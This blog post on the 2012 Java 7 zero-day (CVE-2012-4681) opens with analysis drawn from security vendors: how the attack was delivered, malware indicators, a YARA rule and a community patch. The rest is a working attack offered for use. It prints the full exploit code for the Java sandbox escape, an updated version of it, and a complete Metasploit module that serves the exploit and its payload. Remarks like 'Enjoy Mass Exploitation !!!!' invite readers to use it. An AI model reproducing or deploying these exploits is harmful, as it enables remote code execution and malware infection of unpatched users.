Wednesday, August 29, 2012

New Java 0day exploited in the wild

New Java 0day exploited in the wild



[IMG]

2 days ago, FireEye published some information related to a new Java 0day exploited in the wild.
The malicious JAR file was served from ok.aa24.net / meeting / index.html
The html loads the Java applet passing some parameters that are used later to build the URL
to download the payload. The HTML is encrypted using “Dadong’s JSXX 0.44 VIP”.

[IMG]


The Java applet contains the following two .class files:
- cve2012xxxx/Gondzz.class
- cve2012xxxx/Gondvv.class
The applet check if the system is running Windows and gets the parameters passed from the HTML that contains the URL to download the payload. If the system is vulnerable, the payload is downloaded and executed in the system.
[IMG]









[IMG]


On the analyzed sample the payload is downloaded from ok.aa24.net / meeting / hi.exe
The payload drops C:\WINDOWS\system32\mspmsnsv.dll (replace the file if present) and starts the Portable Media Serial Number Service.
The malware connects to hello.icon.pk port 80. It seems to be a Poison Ivy variant.
hello.icon.pk resolvs to:
223.25.233.244
223.25.233.0 – 223.25.233.255
8 to Infinity Pte Ltd
You can use the following generic Yara rule to detect a malicious .class file exploiting this vulnerability:
rule Java0daycve2012xxxx_generic
{
meta:
weight=100
author = “Jaime Blasco”
source = “alienvault”
date = “2012-08″
strings:
$ = ”java/security/ProtectionDomain”
$ = “java/security/Permissions”
$ = “java/security/cert/Certificate”
$ = “setSecurityManager”
$ = “file:///”
$ = “sun.awt.SunToolkit”
$ = “getField”
condition:
all of them
}
A module has just been published for Metasploit so it is time to disable Java in all your systems
And remember to search your logs for connections to the Domains/IPs related to this attack.
Have a great day!

Details about the exploited vulnerability:
1. The javascript in index.html is heavily obfuscated.

2. This vulnerability affects Java 7 (1.7) Update 0 to 6. Does NOT affect Java 6 and below.

3. It works in all common browsers versions of Internet Explorer, Firefox, and Opera. Does NOT work in Chrome. (Update: The original exploit we tested did not affect Chrome. We did not test Metasploit but reports are that their module works for all browsers. Disable java support in your browser)

3. It does not crash browsers (which does NOT mean it does not work!), the landing page looks like a blank page (for the original exploit only. Future variants may be different), sometimes one may see a flash of a rotating Java logo and the word "Loading"


[IMG]
5. The malicious Java applet is downloaded like you see on the picture below. At this point, if your system is not vulnerable or is patched, the attack stops. From the user perspective, it is impossible to tell if the attack was successful or not.
6. If the exploit is successful, it downloads and executes a malicious binary, which calls to another IP address/domain hello.icon.pk / 223.25.233.244
[IMG]
img.1

7. Although older Java is not vulnerable to this attack, downgrading is not recommended due to many other vulnerabilities in the older versions of Java.
8. Disable Java in your browser, apply the patch (see below), or use Chrome.

Malware behavior and indicators
Payload: : hi.exe Size: 16896
MD5: 4A55BF1448262BF71707EEF7FC168F7D (Virustotal 26/42)
  1. Legitimate Portable Media Serial Number Service MsPMSNSv.dll is deleted from C\WINDOWS\system32 (Virustotal 0/42)
  2. Malicious mspmsnsv.dll is copied to C\WINDOWS\system32 (Virustotal 21/42)
  3. "Portable Media Serial Number Service" (WmdmPmSN in the registry) is running.
Patch :
Java 7 Zero Day Buster
by Michael 'mihi' Schierl, <schierlm at gmx.de>, http://schierlm.users.sourceforge.net/
To use, locate the (jre/)lib/security folder in your JDK/JRE (there should be a
file called cacerts in it), create a folder (jre/)lib/endorsed next to it and
place this Jar inside it.
The Java VM will load all Jar files in this folder and replace any of its own runtime classes (from rt.jar) by .class files inside of these Jars. Note that this feature is not officially supported by Sun/Oracle except for updating XML parser libraries, but it seems to work.
Use this Jar only for Java 7 Update 0 to 6, as other versions may have a different version of the patched class and break horribly. The patch seems to properly block the access vector used by the 0-day circulating at the moment, but I take no responsibility that it fixes all ways this bug can be exploited, nor that it will not break any other existing Java programs.
In other words, create a folder under lib in your Java 7 program folder, name it endorsed, copy the patch jar in it and restart the browser(s).
We tested and it works well - the applet gets downloaded but does not lead to download and execution of the malicious binary. See the pictures below and compare with the download sequence during the successful exploit (img 1.)


[IMG]

Patched Java 7 with Internet Explorer. No malicious exe download.



[IMG]

Patched Java 7 with Firefox. No malicious exe download.




[IMG]
Java permission request on Chrome



[IMG]
Win XP sshot. No malicious exe download on Chrome (tested on XP and Windows 7)



Rapid7 / Metasploit indicate that they tested their module on Chrome on Windows XP. In our experience, if Java is allowed to run like you see on the picture above, the malicious binary does not get downloaded. We tested several times with the same results - Java runs but no contact with the second server and binary download. Testing on the same VM with Internet Explorer or Firefox immediately causes infection. Don't know, maybe Rapid 7 'improved' the exploit and you can send them your thanks if you wish, but the original exploit does not work on Chrome.

The Raw Exploit Code ::
Found on Wild !!!

Code:
//
// CVE-2012-XXXX Java 0day
//
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;
 
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
 
public class Gondvv extends Applet
{
 
    public Gondvv()
    {
    }
 
    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }
 
    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }
 
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }
 
    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
              localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }
 
    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}

Here Is the New Updated Exploit !!
Save It as New_java_0-day_exploit.java

Code:
import java.beans.*;
import java.io.File;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

import com.sun.beans.finder.ClassFinder;

public class Java7ZeroDay {

    public static void disableSecurity() throws Throwable {

        // get access to sun.awt.SunToolkit, which is in a restricted package,
        // so this should NOT work...
        Class<?> sun_awt_SunToolkit = ClassFinder.findClass("sun.awt.SunToolkit");

        // the rest is just a short way to exploit having access to that class.

        // we have to call everything "indirectly" since the verifier would
        // refuse to load the class if it directly tried to call that methods.

        // call SunToolkit.getField to get an accessor to private "acc" field of
        // Statement.class. (That method is new in Java 7, but there are plenty
        // of other (more convoluted) ways in earlier versions to elevate
        // permissions if you have access to restricted packages).
        Expression expr = new Expression(sun_awt_SunToolkit, "getField", new Object[] { Statement.class, "acc" });
        expr.execute();
        Field acc_Field = ((Field) expr.getValue());

        // create an access control context with all permissions
        Permissions allPerms = new Permissions();
        allPerms.add(new AllPermission());
        AccessControlContext allPermAcc = new AccessControlContext(new ProtectionDomain[] {
                new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), allPerms)
        });

        // create a statement that disabled the security manager, to run in our
        // own untrusted access control context
        Statement disableSecurityManager = new Statement(java.lang.System.class, "setSecurityManager", new Object[1]);

        // use our private acc field accessor to change the access control
        // context of the statement above to the access control context with all
        // permissions
        acc_Field.set(disableSecurityManager, allPermAcc);

        // and call it (now that it has all permissions)
        disableSecurityManager.execute();
    }

    // test method, call this like this
    // java -Djava.security.manager Java7ZeroDay
    public static void main(String[] args) throws Throwable {
        try {
            new File("C:/").list();
            System.out.println("No Security Manager present");
        } catch (SecurityException ex) {
            disableSecurity();
            System.out.println("Security Manager disabled. Proof:");
            for (File file : new File("C:/").listFiles())
                System.out.println("\t" + file);
        }
    }
}


THE METASPLOIT MODULES UPDATES :



[IMG]



UPDATE THE METASPLOIT MODULES !!!
NO PATCH !!
MASS MALWARE EXPLOITATION !! ;)
java_jre17_exec.rb

Code:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
 
require 'msf/core'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
 
include Msf::Exploit::Remote::HttpServer::HTML
 
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
 
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java 7 Applet Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in Java 7, which allows an attacker to run
arbitrary Java code outside the sandbox. The vulnerability seems to be related to
the use of the newly introduced ClassFinder#resolveClass in Java 7, which allows
the sun.awt.SunToolkit class to be loaded and modified. Please note this flaw is
also being exploited in the wild, and there is no patch from Oracle at this point.
Our module has been successfully tested on multiple setups, including: IE, Firefox,
Chrome and Safari on Windows, Linux and OS X, etc.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability Discovery
'jduck', # metasploit module
'sinn3r', # metasploit module
'juan vazquez', # metasploit module
],
'References' =>
[
[ 'CVE', '2012-4681' ],
[ 'OSVDB', '84867' ],
[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],
[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
],
'Platform' => [ 'java', 'win', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
}
],
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 26 2012'
))
end
 
 
def on_request_uri( cli, request )
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_redirect(cli, get_resource() + '/', '')
return
end
 
print_status("#{self.name} handling request")
 
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
return
end
 
paths = [
[ "Exploit.class" ]
]
 
p = regenerate_payload(cli)
 
jar = p.encoded_jar
paths.each do |path|
1.upto(path.length - 1) do |idx|
full = path[0,idx].join("/") + "/"
if !(jar.entries.map{|e|e.name}.include?(full))
jar.add_file(full, '')
end
end
fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
data = fd.read(fd.stat.size)
jar.add_file(path.join("/"), data)
fd.close
end
 
print_status("Sending Applet.jar")
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
 
handler( cli )
end
 
def generate_html
html = "<html><head></head>"
html += "<body>"
html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
html += "</applet></body></html>"
return html
end
 
end
Enjoy Mass Exploitation !!!!
Author at